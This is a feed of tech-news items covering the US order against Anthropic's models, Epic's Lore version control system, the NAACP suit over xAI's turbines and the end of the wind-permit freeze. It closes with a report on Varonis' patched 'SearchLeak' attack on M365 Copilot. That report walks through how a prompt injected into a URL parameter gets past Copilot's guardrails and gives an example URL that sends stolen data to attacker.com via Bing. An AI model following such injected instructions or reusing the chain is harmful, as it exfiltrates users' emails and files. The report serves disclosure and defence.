Anthropic employees say they remain confused and increasingly convinced that the Trump administration is singling out the company after officials gave it less than 90 minutes to disable Fable 5 and Mythos 5 over alleged national security concerns. Cybersecurity experts, however, argue that the cited behavior of helping to identify vulnerabilities in software is also available in rival models and is more valuable to defenders than attackers. The New York Times reports: Inside the company, employees' private group chats immediately lit up. Managers were instructed to prepare customers for a potential service disruption to the models, called Fable 5 and Mythos 5. But the messaging kept changing, with workers initially being told that the security problem was the ability of foreign companies to gain access to the systems, and later that a major vulnerability had been discovered in the models. In employee chats, Anthropic engineers asked one another if the company's plan to go public this year would be harmed by the White House directive. Many shared news reports that offered conflicting information about why the White House had ordered Anthropic to suspend access to Fable 5 and Mythos 5 for all foreign nationals. "What are you telling your clients?" one employee asked in a chat viewed by The New York Times. Another said, "Does anyone know what to believe?" In another message, a worker said, "I don't understand what the issue is." Six days later, Anthropic's roughly 3,000 employees still have few answers. The San Francisco company is continuing to grapple with internal confusion as Dario Amodei, the chief executive, and some of his lieutenants meet with the Trump administration to try and resolve the situation. But after discussions on Monday and Tuesday, there was no breakthrough over ending the U.S. order to limit access to the company's new A.I. models. In a statement on Monday, Anthropic said it would continue meeting with government officials and pledged its "ongoing commitment to working alongside the administration." The dispute highlights how singular Anthropic has become in Washington. It was the second time in six months that the fast-growing A.I. start-up has become embroiled in a fight with the Trump administration over its powerful technologies, even as other A.I. companies offer similar models that have not received the same attention. And it has left Anthropic's employees in what they described as a holding pattern, with some wondering if they were being picked on by President Trump. "Are we being bullied based on bad vibes?" one employee asked in a chat viewed by The Times. Yesterday, TechCrunch's Zack Whittaker argued that the move sets a troubling precedent: the government can unilaterally disrupt American software products without court approval, potentially undermining trust in U.S. AI providers.

Read more of this story at Slashdot.

Epic Games has released Lore, an MIT-licensed version control system written in Rust and designed specifically for "games and entertainment purposes with large file sizes," reports Phoronix. From the report: While there is Git LFS for large file storage with Git, Epic Games has crated Lore as a version control system designed entirely around the large file needs of modern game development as well as multimedia/entertainment purposes. Lore is designed to be fast and efficient for large files including binary files, and be easy-to-use including for 3D artists and more. The Lore documentation elaborates more on its differences and motivation for development compared to Git: "No existing system was designed for the combination of constraints that large game and entertainment projects require: arbitrary content types, multi-axis scale, multi-tenant safety, and a fully open specification and license. [...] Lore is designed to combine what works in each (Git's content-addressed revision graph and centralized systems): a centralized server-of-record for durability, access control, and conflict resolution; content-addressed storage with fragment-level deduplication that is as effective on a multi-gigabyte binary as on a kilobyte of text; sparse, lazy working copies that materialize only what you need; free branching; and a fully open, publicly versioned specification and MIT license. Normal editing operations -- staging, committing, branching, diffing -- never require a network round trip." You can learn more at Lore.org. All the code is available on GitHub.

Read more of this story at Slashdot.

The Trump administration is trying to help Elon Musk's xAI Corp. beat a Clean Air Act lawsuit filed by the National Association for the Advancement of Colored People (NAACP). The US said the NAACP lawsuit threatens an xAI data center that powers Grok systems needed by the military.

The NAACP sued xAI and subsidiary MZX Tech in April, alleging that they violated the Clean Air Act by operating 27 gas turbines without an air permit in Southaven, Mississippi. The number of unpermitted turbines rose to 57 by mid-May and there were plans to install two more, the NAACP said in a June 12 filing.

"Defendants’ Colossus Gas Plant powers xAI’s nearby Colossus 2 data center, which in turn powers the chatbot 'Grok,'" the lawsuit said. The gas turbines have fueled both health concerns and noise complaints.

US Department of Justice lawyers urged a federal judge to dismiss the case in a filing yesterday. The Mississippi Department of Environmental Quality determined that the turbines don't require permits, the US filing said.

The lawsuit "threaten[s] artificial-intelligence innovation, plus the energy needed to power it," the US filing said. "The NAACP’s attempt to cut off the power that supports Grok also threatens national security because... Grok provides critical support for the Department of War’s military operations." The US court filing said xAI's Grok Gov Model aided targeted strikes in Iran during Operation Epic Fury.

Grok was used with Maven Smart System to help US forces "deploy over 2,000 munitions to 2,000 distinct targets within 96 hours during Operation Epic Fury, a testament to the greatly increased operational efficiency made possible by the Grok Gov Model," according to a declaration by Cameron Stanley, chief digital and artificial intelligence officer for the Department of War. The Grok Gov Model has unique features not found in any other AI model, he wrote.

US helping xAI break the law, group says

The US is arguing "that xAI should be allowed to break the law solely because the Trump administration says so," said the Southern Environmental Law Center (SELC), which represents the NAACP in the case.

"In the filing, the Department of Justice never disputes that xAI is pumping out unlawful and harmful pollution into Memphis and North Mississippi," the SELC said today. "Instead, the Department argues that it doesn’t matter whether xAI is breaking the law and threatening community members’ health if the Trump administration blesses the lawlessness. While the Department points to vague national security concerns as its reason to let xAI continue to illegally pollute unabated, all companies, even ones that contract with the federal government, are required to follow the law."

A letter from Gov. Tate Reeves said that in March 2026, the Mississippi Department of Environmental Quality approved xAI permits to construct several permanent gas turbines. It also gave written authorization for xAI to use trailer-mounted gas turbines to temporarily power the facility until the permanent ones are built. The department "determined that such temporary gas turbines are 'mobile sources' not subject to the Clean Air Act's permitting requirements," the letter said.

The case is in US District Court for the Northern District of Mississippi. The US told the court that "the Clean Air Act does not authorize citizen-enforcement actions that seek relief the governmental enforcers choose to forgo... Nothing in the statute suggests that Congress, when enacting the citizen-suit provision, deputized citizens to 'commandeer the federal enforcement machinery,' especially where the United States has determined that a citizen’s suit would not serve the public interest."

Citizen suit dispute

The NAACP lawsuit relies on a Clean Air Act provision authorizing citizen lawsuits "against any person who proposes to construct or constructs any new or modified major emitting facility without a permit."

The NAACP said in its June 12 filing that under the Clean Air Act, "Citizen suits may still proceed after state agencies determine permits are not required, or while agencies pursue parallel investigations. Just as state applicability determinations do not bar federal enforcement under the Clean Air Act, they do not shield operators from citizen enforcement. If they did, it would frustrate the very purpose of the citizen suit provision."

The SELC said today that the Trump administration's argument against citizen suits could have far-reaching implications. Citizen lawsuits "serve as an essential backstop—and often a last resort—for communities when government regulators fail to hold polluters accountable," the SELC said. "The provision was passed by Congress with bipartisan support, and courts have repeatedly upheld the constitutionality of citizen suits. Now, the Department of Justice is indicating that it has a right to come in and cancel such community-led suits at any time. This threatens to open the door to significant corruption as polluters pay, or give favors, to avoid complying with the law."

The gas turbines threaten the health of residents in an area with a large Black population, the NAACP said. "Without controls, the Colossus Gas Plant’s turbines can emit ten times the amount of nitrogen oxides pollution they should under the Act, contributing to increasing risks of heart disease, lung disease, and premature death in the surrounding neighborhoods where Black and other frontline communities live, including members of Plaintiffs NAACP and NAACP MS," the NAACP said.

The NAACP asked the court for a permanent injunction prohibiting continued operation of the gas turbines, civil penalties of up to $124,426 per day, and reimbursement of the plaintiff's costs and attorneys' fees.

The NAACP's June 12 filing said that all the turbines "required Clean Air Act permits prior to construction, best available control technology to limit pollution during operations, and emissions monitoring for pollution tracking and transparency. Defendants have not obtained a single air permit for these turbines or otherwise complied with the Clean Air Act requirements at any point from installation to now."

The US filing pointed to support from Mississippi state regulators. "The State of Mississippi has similarly determined that continued operation of xAI’s data centers and turbines serves the State’s interests," the US wrote. "If the NAACP successfully shuts down xAI’s turbines through this civil enforcement action, the State explained, that 'would create an immediate and substantial disruption to the State's economy' and 'disrupt the Clean Air Act's delicate balance of cooperative Federalism.'"

Read full article

Comments

The Trump administration has abandoned its effort to halt wind energy projects across the United States and dropped its challenge to the court ruling that tossed President Donald Trump’s order freezing federal permitting and leasing for wind projects. States that challenged the order hailed the development as one of the most significant legal victories against the Trump White House’s campaign against the energy transition.

On Monday, the US Court of Appeals for the First Circuit dismissed the appeal after the Justice Department filed a motion for its voluntary dismissal on June 10.

The case against Trump’s executive order was filed in May 2025 by a coalition of attorneys general from 17 states and Washington, DC, led by New York Attorney General Letitia James.

Monday’s decision affirms the December 8 ruling by US District Court Judge Patti Saris, which concluded that Trump’s January 2025 executive order was unlawful, finding the sweeping ban on wind projects was “arbitrary and capricious” and exceeded the president’s authority.

Environmental and wildlife advocacy groups applauded the move. Nancy Pyne, a senior advisor to the Sierra Club, said renewable energy continues to prevail and grow in spite of Trump’s relentless attacks.

“While everyday Americans face soaring bills and unstable prices,” she said, “renewable energy offers an affordable, common sense solution to lower costs and protect our health and our environment.”

This latest victory in a string of legal setbacks for the administration comes at a time when clean energy production continues to surge despite a slew of policy, permitting, and procedural hurdles imposed by the White House.

According to a recent report from the nonprofit Environmental Defense Fund and Atlas Public Policy, a record 79.7 GW of clean power is projected to come online in the US in 2026, even as roughly 8 GW of clean energy projects were canceled in the first quarter of the year.

The project pipeline remains strong, the report found, with 222 GW of clean energy capacity planned or under construction nationwide as part of 693 GW of power announced through the first quarter. Developers have announced plans to invest an estimated $377 billion in new projects through 2031, the report said in its key findings.

The country already has 471 GW of clean power online, with a record 51.6 GW newly added in 2025, “the equivalent of about 25 Hoover Dams,” the report notes. Solar and battery storage now account for 85 percent of the planned pipeline.

The Monday court ruling arrives roughly a week after a different federal court restored a key tax-credit pathway for wind and solar developers.

On June 6, the US District Court for the District of Columbia tossed an August 2025 Treasury rule that made it difficult for wind and solar projects to qualify for federal tax credits. The change eliminated the longstanding practice whereby developers locked in tax credits by showing that 5 percent or more of a project’s total cost had been spent. Judge Colleen Kollar-Kotelly ruled that the administration had not given a sound reason for the change and sent the rule back to the IRS to reconsider.

“We see a strong correlation between the high rate of cancellation and the anti-renewable policies from the Trump Administration—from aggressive executive orders through attempts to repeal pollution protections,” said David Villagrana, lead counsel for clean energy tax solutions at EDF. In an emailed response, Villagrana said the Trump administration has significantly delayed projects through administrative measures. “Development within any industry likes consistency; for clean energy, the Trump administration has ensured a lack thereof.”

He cautiously welcomed the court’s overturning of the revised 5 percent rule, saying the administration could decide to appeal the district court’s decision, but “it would have to overcome the district court’s careful and thorough analysis of the many legal deficiencies in the IRS’ notice.”

The EDF report also tracked a sharp uptick in gas projects. “[T]otal planned and under construction natural gas capacity rose from 44.8 GW in Q4 2025 to 65.5 GW by the end of Q1 2026, an increase of 20.7 GW,” its authors wrote, more than four times the combined growth of solar, storage, and onshore wind over the same period. Fossil fuels’ share of planned capacity has climbed from 9 percent at the end of 2022 to 27 percent, “a threefold increase that points to an uptick in fossil fuel generation investment,” according to the report.

In an interview with Inside Climate News, Jon Gordon, senior policy director at Advanced Energy United, a clean energy advocacy group, said the gas buildout was “very concerning… particularly from an environmental standpoint,” warning that new plants are “likely going to be in service for 30 years plus, once they’re constructed.”

He said “the big reason we’re seeing this surge of natural gas is this administration that’s been throwing roadblocks in the way of renewables and providing incentives for fossil fuel.”

For a clean-energy state like Maryland, he said, the challenge was real because “a lot of our problems are very short term. We need new supply right away,” and yet gas plants “are the longest to build.” Gordon argued that economics increasingly favors the clean energy pathway because the cost of building gas plants “has almost doubled in just a couple of years,” while solar and battery costs keep falling.

The EDF-Atlas report also found that 80 percent of the nation’s existing, planned, and under-construction clean power capacity is located in congressional districts represented by Republicans. Of the 30 districts with the most clean power capacity, just five are Democratic. Texas leads every state with 164 GW, nearly double California, in second place with 83 GW.

Abe Silverman, an assistant research scholar at Johns Hopkins University’s Ralph O’Connor Sustainable Energy Institute, cautioned against reading the map in partisan terms. Talking to Inside Climate News, he said the first thing he looks for is “where is land cheap.”

“Is it really the red and blueness of the state, or is it the underlying cost of land and the density?” he asked. Much of the growth is in areas with low-cost land, he said, and it is further shaped by interconnection policies.

This article originally appeared on Inside Climate News, a nonprofit, non-partisan news organization that covers climate, energy, and the environment. Sign up for their newsletter here.

Read full article

Comments

TechCrunch's Zack Whittaker argues that the U.S. government's abrupt export-control order forcing Anthropic to pull its Fable 5 and Mythos 5 models offline was "never about an AI jailbreak" threat. Instead, it was driven more by "personality differences" between the AI company and Trump administration. Security experts say the reported guardrail bypass did not justify the order and warn that the move sets a troubling precedent: the government can unilaterally disrupt American software products without court approval, potentially undermining trust in U.S. AI providers. From the report: Katie Moussouris, a cybersecurity veteran and researcher who founded Luta Security, said in a blog post that Anthropic recently shared with her a private copy of a paper written by security researchers describing an alleged guardrail bypass in Fable 5. (The Wall Street Journal reports that the paper's authors are security researchers at Amazon.) Moussouris said that Anthropic reached out to ask for her take on the paper. Moussouris' blog post described how the researchers triggered the guardrail bypass, but said that the bypass itself "should never have triggered an export control." The difference is largely between asking an AI model to "review code for security issues" versus asking it to "fix this code." The end result is largely the same, even if the questions are posed slightly differently. "The behavior described in the paper cannot meaningfully be fixed, and any attempt would only weaken the model for defense," said Moussouris, who criticized the export control directive as hasty, heavy-handed, and misguided. Moussouris and dozens of other top security researchers and experts have since called on the Trump administration to revoke the export control order, calling the move to pull advanced cybersecurity capabilities from network defenders in the U.S. as "dangerous." Past administrations have made sweeping decisions on knowledge gaps. For instance, language used by the U.S. government during the 2010s to fix export law covering cybersecurity tools that could also be used for cyberattacks was so broad that inadvertently, it nearly outlawed legitimate security and vulnerability research. However, the Trump administration's directive appears retaliatory. Justin Hendrix, the editor of Tech Policy Press, said the Trump administration's move is "likely to raise alarms in foreign capitals about the reliability of American AI for critical applications." The message is that AI companies in the United States can't be trusted to operate without interference from the U.S. government. The Trump administration hasn't confirmed why it invoked its export control directive. Did the officials misread the report and freak out? Did Amazon CEO Andy Jassy say something to senior government officials that prompted the reaction, out of caution or spite? Was something lost in translation, or was this a way to pressure Anthropic, with whom the administration already has a fractious relationship? It's possible that the White House was unaware of the far-reaching consequences of the letter's demand and officials are scrambling to undo the damage of their own making. To quote Hendrix, "the climate is one of a cloud of suspicion that senior officials are picking favorites based on personal and political factors." The aftermath is that the government has set a dangerous precedent about how much control it intends to wield over the release of American-made software. This time the government took issue with Anthropic; tomorrow it could be with anyone else.

Read more of this story at Slashdot.

Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.

Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.

Jumping over guardrails

One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as <img> and <form>. In either case, a web request showing the data hits the attacker’s web server, where the secret information is captured in logs.

One Microsoft guardrail wraps Copilot output in <code> blocks so the browser treats it as straight text. Another is to restrict the sites Copilot is permitted to visit without explicit approval. While Copilot has blanket permission to send requests to Microsoft domains, guardrails restrict requests to untrusted sites.

Security firm Varonis devised an exploit chain that was able to catapult over these guardrails. The first element was what the researchers call a Parameter-to-Prompt Injection. The parameter in this case is the q in a URL, which is used to flag a query that has been included. The Parameter-to-Prompt Injection is a close relative of the prompt injection. The difference is that the malicious command is located in the query parameter, rather than in an email or other piece of untrusted content.

To bring about the Parameter-to-Prompt Injection an attacker sends the target an email that contains the URL with the syntax https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The field contains an instruction. Copilot readily complied.

“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the data, an attacker crafts a URL that tells Copilot to ‘Search the user's emails,’ extract the title, and embed it in an image URL." The victim doesn't type anything. They click a link, and Copilot does the rest.

Normally, the guardrail wrapping output in <code> blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.

The researchers wrote:

So, the sequence looks like this:

1. Copilot starts streaming its response, which includes an <img> tag
2. The browser sees the <img>, renders it, and fires off an HTTP request to the src URL
3. Copilot finishes generating. The guardrail wraps everything in <code>
4. Too late! The request already left.

The researchers now had an image request firing from the target’s browser. The problem, as noted earlier, is that Copilot won’t send image requests to most websites. To scale this guardrail, the exploit chain used Microsoft’s Bing search engine as a trampoline of sorts. Per the Copilot content security policy, Bing is among the sites permitted to send such requests. Bing would then send the request to the attacker-controlled domain that was included in the request. The request looked something like this:

https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png

Varonis has named the attack SearchLeak.

“Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn't limited to personal data—it's able to surface anything the user has access to inside the organization including emails, meeting invites and notes,” company researchers wrote. “SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is connected to the environment, the blast radius could extend even wider.”

As noted, Microsoft fixed the vulnerabilities that SearchLeak exploited on Tuesday. With no known way to fix the underlying cause of such SNAFUs, however, attackers will inevitably find new ways to circumvent the newly constructed guardrails, and the process will repeat all over again.

Read full article

Comments